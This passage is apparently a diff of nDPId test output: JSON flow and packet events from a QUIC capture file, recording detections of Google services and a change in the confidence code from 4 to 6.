AJZx8UDtbZOWODHW2DvBPFPoCX6ZQVBXs9voksBXC+G9JF7eqoFmqO\/EH6soGSg6sF0snwdl4Tmbozt2\/yp4ye5MHCKh12GvgAGa\/SRfEXeWrk94V+VCNFH+5X7\/8EcicVy7uChM5zWex3QUxbJVdLP\/j5AI3XbgkHGGZyofmIhkZxWEV98Sv0kfttNMcxA841+aSpRVJN0a2XfeGieapwvw\/R6yETR9CN8
TcQTFe6UQYPq7543m22E4Sg8mtjsfi7GhTVtBFlPk02hhEbcLmI3PLT100l2b\/h+mQABi\/RqHWxECe91tiAPUoarX+VKj0c3DqByummicCRPZ6kkW6whbXho2HsoAk+D7QoyjIYr\/kbmXT3ddi5XSAc3T\/AXjnmkbnhNKsXrqcM9kMdl18Kd80bmVHFpHplnIJlyzn8ksEEhjYfE\/gaufdnXnq1D3ABRKg2gQzIvoSpfYLvtOATq8ZeC375hfqRNXtw\/n1kUK3bICXzA6mFxkmQD7AGOSqcR3jSdloiLRo+G\/p15yY7zRCuvYbEtKyY7omcrKB9AP+U0Y\/znYg58r4wOaZBC4V+dmRK\/kkpba47uaqRhUyF\/yTdt5a8rnd6rmCkS\/vkMPoDjgVn9aKrD3m9zX1zDlvbDZWh6g6iUswysusJDPEcMqVt9oBikmJmTA4XJHL7KebwbAwBNS3e6+CgYETncO9oV627jebHXfk1gOzNt336lADXC3SIjRhE0xUCj9b7vGl2zV\/XiVaHp4BdieNUYdFnptfsJwounQcX5RSNrDM7WkoXytf9j\/GcyxSIH55p+0ANjoTPQ14vhNgMa5CNLbJsAFOaOAZLOmrRttaEW+CIy\/6QEDgSPdDqCmjHaTsDMAS0PJ+CViTPaRKX9Mb\/HoG1+hLb7WLn885xXvuCUz6bu45JBXtjOSd2sFZtZL5SSAAkPqTlNn4yof7j6smtUT03YKs+rhKLROxwhgN\/v7YhG5RqBATOJnmQaGvuGYn8hIWfZ0uuo2mUCeo5E23kwQk4p+DKVCBDeHuSFjGPVCnKBGHNbnoLJC5+6z0UTOz+H8VNr5FqbVxdiFV1rCMp6QITKc\/"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621492846202,"flow_last_seen":1621492848301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494601272,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621492846202,"flow_last_seen":1621492848301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494601272,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":111,"packets-processed":110,"total-skipped-flows":0,"total-l4-payload-len":148500,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":71,"total-idle-flows":70,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":328,"global_ts_msec":1621495208068} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1621495208068,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495208068,"pkt":"AAAAAAAAAAEA4PSECABFAAViwetAAH4RV8iokEAFXWSX3eVPAbsFTgNDy\/8AAB0IwxBIsrHTx3QAAEU0bjduGiBH9YcAvIt1wprzZRiYJMPzF1MMPECwlUSWc\/RBbV+iPDb\/v0+UPTqOqIz1XEDYAo7pbau308le6Th0FZqRlv4SU+qXh+iRpNvtIutuNBwNhb6WnLZjvRY70vVsUgD0scdNaDgMj3pPrZ0V8bA\/xmESw7VNToLPcOadkH9MHbF41jMAPEaD3xqUkat1\/m5M4Pv0eZtU0YzflDUjEcIUViabEpyfwesJgnqwj9BXqmfBSQXLW6uS7UCVUFH+dCmqa\/iJJ4SrwnAYJlCIN9NwJ+1Ze32XUdoN4V9vQ5GScujeLsdwY+HlSYWOZd9d2+\/d597gVGXqOsrTKKKVZCRdEs9QySjbJmNdJ4wcHvezwRkLYorieHie4sHilr6O5PVEqCfP8aHxH6msP3pHsklsYop606JbaZfCUfDG3w9nrXiNdmjL4dJ0aBKky9\/MhuPCuq4g15oIigu1FWbGfnmKl3BVJ5ryEDgMgOYehMyIJ+weIqtrAsvJaI2654d2yQ2OH9clUvxOeU\/jKLdsEL55j4Tpx9kOP9X\/3VWUCYt8YZ5rPGJN919ko9rZSBS1iM\/mjZCh7R6C1BomS2uqQqN\/2PwrKORuR7kRPmRkEsFpLoC4sATPr\/GTOP4nq63u7VF4sRJLtFi0qkGLBgbQiSIJZtFdtEjfxSrL6lqAnUrfYHAOISDQ1zIN1STDOnYrZ+Szd6N0NTZjKTFuAILRTK6wWG7zCeHuTNeZX8\/oHFYs7C7zyiGROiQkB8jkJD03SKBESsIOyuKO34yRQ7G+tB9M+WUrPUQDrOaQYjktHLjExIf+tn3Q0v0e\/rX\/xZZ3jNOD8Qo4cgJe9IBtNjEwXGPmZe0mVY\/ufgxNE1QutAq0xthgcM+KYUEAzsSQrzZK7ZOiLzHOqVPgXabqgy2oQWta7AlIrCSdCUHqqZ2Br7i1\/EFecVKIWlJ6vPFrZrOW1amQ6rV5WG6x9ovznlQWmBXygRZ6Zl6H11NDYyBm3Xb8pfynprut37QWSPCciwK7rtbnKe+EUnnE3Lnwb5XQzYSEfhojjMsjXsuZk2\/ovtBV2Jkl90MUUjDk4XeHIhe5n2t7qmj8rxsQKuxj9rBjDRjH+OIEZKEgLrFx5GoAGcYxzb3iHJF3TqdzTXu+qBokr4C959Ki309NAHaXzDaotCBtbPJMmwo9pqOst5Z\/tUfAwxDkswPSvCJzhA9mKCrSpl9Hf7PMyNrHdZTvaZMSASEy5\/sXqR7D3JPQ0B6dM9WwJIOoJ9KhPZ04lCOFJrW856gP8dZwzXWKZ5I\/qcrmankwbLnu1BKyarOpUL01fzxuRuamfUYfUru2TsLlGCUKIoWaMMrIKq4yKC6\/6T\/HJSYLPqY6fqVNsFh7bYwtGviFJVCGEYBPrNIOz4yL3nUg1+uS6Kxs3zX4N67DQOOGoQbq6bHyTlfJI4n01aPlGre0bfmC6Tp3JWM98e2
jHYR5XNuWQjoxn\/Z1NA+ZLc3yPpyEnSO4zqV8lVzpFrDpqkbQ9ycyuV\/D1kx\/32e3Zc0t0r1GFlvu5HnAklFEwANPKBU7ocnXr4EBpq1xKM1aTAWc1RcVfilSm1xz82LQyCCJOc5iO\/zmin3ZpftGXkTCNVvQW1LtwAAhh0Zlx03rw7AC\/J1p0cID8UBIj7r9QeymlFafS9\/16+RcZYgdL3KUrKdHSbSrCPKTng4X0j\/abdtQxrxTSZYjKGQPl+WBVoLmCgqLLkuJIJhEXfQiPfgtO1fDtgu+l2TZCwO8OKgySKJH5cW\/"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": 
{"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1621495210744,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495210744,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFXpAAH4RYIKokEAFgPgYAdcaAbsFTt\/iyv8AAB0I2zeQoOz5WyUAAEU0jhtk7ZYO\/t++QG80XD8xnpwXGKbf+FVJ+ISOgwLVL45kqQP6tSuWth5HXdoJc8ZyI19g5++SRrnWaPSJCxPjE9g315E4TbKU9m\/we74ovYlIndf6LYLJ0WqrP6o8IkyXDszg8SzZSMt4M30t4SgDRR6Q5o2IbPGolAh7UamAr90QEylR\/uIS0sasMvvkSpysRp9ckggnCAbstJcHBvinhjkG2VSPzmjNJoDsOtvPqHPtJvNpojktPxYWHTjpWdYUAod79DMkXY1vRqntsgNNDYXeZhdoXwH2HWV\/exDKz+F9bcgQNX6hnXanzIbxcQxbT7yuzcXLZMUP0rJvP9NrvYnLotM2YIP1NkqQ4MUgi\/LE+5\/YOOGegvWSeBErSprROif2Slau6EpF9Rq4x9QyI9geY7GPFow13L3eizcByac8aehgQKHihAWI+Aqo4T9GXf2lmgEXe5yhso68TiNdxt41vH2DonLNC7Tc9M7Yorh3IwY5xUSGl\/cKy8\/pNoo+tpLVj71oehQFnGVEF+ybMdivZd+7KU8tyx6ITEtXyiw3M6HXXtpk3dR6MsHhhasZ7jAjpsXi+vLpD6vyr7XXniVlK3Lr9
tM5wlg\/jvTaI4NkA218LBhKKGxwAGv8oCPrc25uEEjEejA5BPJgFu\/CiYBkhUaI\/kKl+nzfCcirOfwodGDc0COV09EassJlEJui5t3XnNV6EBm1lbnXwDWWeI0ApwOcHPJltBOadayMvcNnaSTKZUXlUZMHRVbucS36AeTVGz2gPUzmorPO2uaLQlFHbWbB1zjXeyc\/sJ9mtAMr9ZhShgV0cowmNG2pc9FJh6Zn2x0Xdbc0IwQyY\/6a4THfFzmMy8Jtca5vfwAC0913Z93ITxHg81JUp2VflW10aNBAK\/3ZclhXoSqIkiv185lAI98fihhaKIrmzK7Fy6nPKOaw7vIegqSSG6ZapEOg4SzV+xRYAgVte+oL1b6sJHDlbzRsP5zepWbsm85VJ63ZrUR3u8MAlt62wM0wL9097D97l3SQ+cYuK9W7nyjYx\/9BD+SJW0v+X4XA4vtGpyhFY1DOIH63kMLcMhe5aDv7B4XYQtlwZaWWnHrImv3mrYyGAL+lEluvRLRX9rEY5R\/mNiI2y6wWHzjt9pDJSkSYvJlR0qHzUue0vQ47hV0cK3JJqNngTXscTgX9aYnkYr8r4MNj9MakUpjEbwITu2IBh382EjALjSzLNo2XcWehzOYL27v3D7d7PDtp0rnG4OUFoW+IyHj1keIWK86WJtFdeBDMshTrkFdQohEGsthgjzPLWNJmhJL8ga45Ja1nwcOo2JogHVMcm8q8wtFTZXshq8+LkDrjmtHkC+WoUNWaOeSKZ7j\/oemgVwqEl2l7mvAzOxEJr1J3TfhfKU1NpXw7rDWKDBvJTfPruGKdPzB3Gxe\/my6eLPCswoooJpfxjAeoA1wH29XDgAt3X+b1xk+iODC\/DDY95uzF1zP+yDMe\/+Jl96QUOQQu+OtftKDxI85nxzLNHxoZjwWaFyJc1wCIfTz7dFAlvTf4s7vP5d2w81Q2oT0WBCvyq7u\/FZL7sO3QU\/WJNEl\/cHjLi9alY6m3pmUEjfwLy\/F1tNlRzfnY4\/lLHjdHuE173k72dusgFghWwAhzZ6MyVF4vHBG7y6pAA0Aeb2SJB\/LM7yndloeF5OJdKc8z0xx74TFrQsJXZitMjB7tfvygzYT0lT0+ydw\/XW3s+g3kR+JzDjS\/1mehf\/csJdmyGhkB5thAT1Mu4dteApqj"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows 
NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1621495211515,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495211515,"pkt":"AAAAAAAAAAEAS1QMCABFAAViGaxAAH4RgN6okEAFQSEzSvG+AbsFTsazy\/8AAB0Igb5NFJ6PF1oAAEU0xCAwnLtbjGUk+fejVmQozQOg0\/ESmN2FG+LOLPBns4theX05eIqUs4AHp7MrmdBMpaQWbc++dLtAQvCTs26HRJJN3DNALzirEZEWeKXTpfa8Ts+3tIY1yxvgw0lrCnC6WI4RVm+nJiWVtstu+BEaotx33QRtR1Kn9gDj9C+jgzsJvfbt+\/T4njpF9igVWsDeg57RA8NGboKJBBGDNLF0BQAAStKBXmKkpSZb\/Ai8RWN1Wct3KRq4r+qQ3P3+\/sCREOyEForD1qoAlfL9ibjQ5mOCpDDMysyN6vJIZBLAIDyvg4ilAKvWZ4QDSMJ9OgKY0ajtVjTL3fziHI53PUsTfoKz2LhwyKEfX8BmjBWA0jXT+sxB1lLAO4+3hy6jMxtGkeNNuhNuHvXbZMw7KZQweD2KxBTPSRJj9h4XOpS9jecr39\/eI6Ufn0VUWTti96mlVggW1ELQ9Gzv0mt6Sj\/iXWWlhaBrl\/5KcWrRXkoydLMLw9Vzz87jbLyNeVZLuWpfVSUh7CI0Rg1OwuBa6nYtOTUcERnuMjACBglx\/HzzMAhlNNo1t5mNQXmjiSnKPJhZCnk3p2LZGXu87vxRMlxSffV4SqrXO7wDQkUSYxXb7oZWdtThtgLUTVT2enl18CO7EnZE\/hMsDrKUng1wrmlJiEAKhVx84skul7zziN\/swLfTsLc4L\/Rh56+ksEb5ZOBD9pay5QOHbuHrJRo8m4CZVNnj3Dgx3xr+3JuKUvg+kOM3m7RI3Po4kt\/n8LAUml+mMQfl4NvAr6ubkDP1xqfcw0TJPkD7yMj6pyeGUDLzkvCt1A0lzBCbBAB7LgMBDnqF3+TKn8wjqWaCXD9\/MfwpZrUigX6+BgfBJhekq66OqMCnJ+VHQc6YXwl4WRujuUw5VdXOpzTw0OxPy9jF30qmvc6CFrRXOsheI7s1ZpaGAgRg4XoM2GPa0j8SFSUdAeiDxEG8GLGwk9cj7WlLuHBSvlmgsNsYJ\/GryTsJnP+UFmNZdhzB35TcvHB92LSpb98htP1t+0qfXuWWt\/XxIGWQ05O2i+qMOSQAGice3HQtfoGUecR1tnZtD3M+AG82g+yrfUCtloJRNeKF4i+NLICfC15RBLdQmyBHI4Jp0PrgoY29jnIk\/NXK\/K69zMHG9dwfAuGYGjV5+7S3O8LN0VKHpZX2MPzHvBSVAEeLIIrFvxPd5WAk\/NlP+VCgZeDw2WLWwSoBMKn3Hb45mqCzrz\/ewbbbIqKa5xT0fE07dK1+T6w4nEhZjWHuJ+RgLpytAUeLaUhAF16fa9AfEFIgjKGqBWJ9N5FXIQ5vG3\/jF6jSbeNlArJDPsDpC\/S4qXX3v6NM9AxXeUI+b6sLh2qGEkgH5rpD+sQDjPQTrbQ9qeHP9ScuuqxyVEFwBWkAsuBI47Z78qebLTD5Go0mPgMzirhwrkhtfLutVWtNkaHwAf+JYotY4qEhDzPGiadbe1HrD
oGvbocggh3pxX51uqeJMe9WOH1FUYy5Gu\/xsfRfOCfcg2F\/V51slWJp5X\/9o4XM6Bw0YcrHBxfj9HNFN648ftB8pJP71vfUXO0grtae2iZgpV2t8zUeIX9GgkZlNUlWEMf9\/3BjG091t76vGyBugi9d89TV0NhohcgwJ+qcoqlNXcuHjhk\/fOqUS3wjE+1eYp5M6IexXwbRv3Nz+DIlCZvJzr4JVfLqNZ7hMWmHMe1dmGGZmJYxst5jAT7KaRnygYqCur4qVoS5QZ1HM+7v4L06XXJCVSvXpuEzfgoozex+hKNh2ucO"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1621495211714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495211714,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFYZAAH4RYHaokEAFgPgYAf9vAbsFTmBDy\/8AAB0IOJJ3hsacNv4AAEU0baY3xqzzCvPxyArXzKLDKouHC7RJHh3pTwE\/T+gSQ10GMfO+dVkOJKeQmaLmpDDYpWDl93SoFgzgGj9JyJNxMfBbB3KINp6o8wpksTBkLOXzlV1A9kaeJmvRuK9RfLEFAe9vWScl9hjEsPcf\/QHzr36kD0umOekJmoKT6EqNBn5HwV2qpv87uu9skIz297knDD7vXWjxtwVhWb2tUz96K+btC4+kYJ\/VTNFpLAAIcX3fAe2CLqMf5rdoAycaNQOrLtyNhjw8JnO7NaOOS2\/V7TAr3iqoiWd7r9g+yYn6wAauOjYdWUM3sLAzE8JEijyJO4SAWMXK5LL45C8m56doUnVsNdTCfisF3ey+SwnsCSNggQyi7Ouznig0OBO44rroi3XNqvU4LOwiK\/7gydyfJ7z8wQ\/CI7gjztoz6kc8GMvLgxoJrOq5QzKGL6SbpCNfU6v5q5B8KSG99Sw7MC0kFWTOVIriQx89bvz3x8+ENfpFjHGCeDGEJs26uPwMaNh7ZXQJu1bIpbynvx5JRciSvltkVonCWFzNIp85z5bLW0qXOR0D8EYnkuSjvrZjqrNGNBMZrsHxs1dhO9sGDPIJZPKKGbiC1LxvCMo8x
LyF2KZ4PDuHQao+nhqvmJJ0FnbteaTR2scFeXrZiaEGdUThIbCZ7xFmpi7zJM6Ez+sDozO+l3U\/nDTzpPqb+YFL\/0gJU\/AUM69B7j2ezG\/ZIzXQnvmArJVY6m58fYrvGMWNWx5RPDKMXRovwphMGFpUrttX+ttkG+hnB\/imTmkNkUHlqG7g4Q9yRPtSmiXNoEcRe2m8G82yLhBdi9vCclLuBd3LIW1+jXuzc68F1rWZrdVl66iE3UrQLgYnE9WlbCx8vO9E1HF4UpTzPBsFkz\/gOnRuc5WFYHt8O1tUyjv+r05xeK\/ucSaip+2KvZ2Wn1vtwi1odfHkn928POP\/fatifY3iR8WW85F8j4l7UkwInAOtPIz4a6KaKlhTK7GHeMTHER7C1+udBnuKafcdz2PCgJtfWbNxuRucdkkL4mtNfG+hQ\/oCMcBz2poMGIWruxUUwjSwDC3\/Z\/7ipxJOYFn0N8zoMZoCBCBecBVZsLuTJPhNhGB8mSVMMgG2PIsT5NsIOJgovfJrMge08M6CwHrIrU9N5WoiLUvWzJR6vtyL7kEOB70wX6qeabNuf460VB6kIYBN0ZylEP6ZPp4E1RdeoL\/+gOoUe\/V+fKX2QyW1NVSMf+bPC79LkMK0mq2Yhwu5OOnXK1F5\/htvUXqZoAIfhzWAb6naxPrZnP3UqpUf+sMeFX1+B6L98E8Ga9Q1eAsSEPQKRPMDqtSqUKcxSBTRIdpIsSVldrFya70Ko0OKwa4MImURluJnCIMGigCLraP1uJSre+IlkkCQHx+ALZFgGUF0m6nJCLlzQIPva5PhNjC1BFxFj1qqzQq2jmua3tWhbeE7be6k6KK7E9msFfmbvGWCvXmtAa38RMRgtaAp43rM2bZelQ\/hndrt4tse1PjmE31ey8yFJauzvzqjCU95vawcS9zc0SFlOFUMyEq1YWPNDLhqRw2bLrw77gsmS60Do+kYYnbefAdllcPRD5EtBLZ\/rvvE255KhAfhLTFjkdJhuYORsFfaeyqgTFqFjOPcC5F7SZ6rgIV3ZOpPO1FLTknWKAEeYHjfgojr6Fd+FA3kLkSHqNanwaRwB5wf+KtFKdlHSWZ248KX1x+WbTZxOW144N1+mnwBxnyKg8oVlnpGY0NEGjU76RZdNILMXhsMVMGO5Nf2"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev 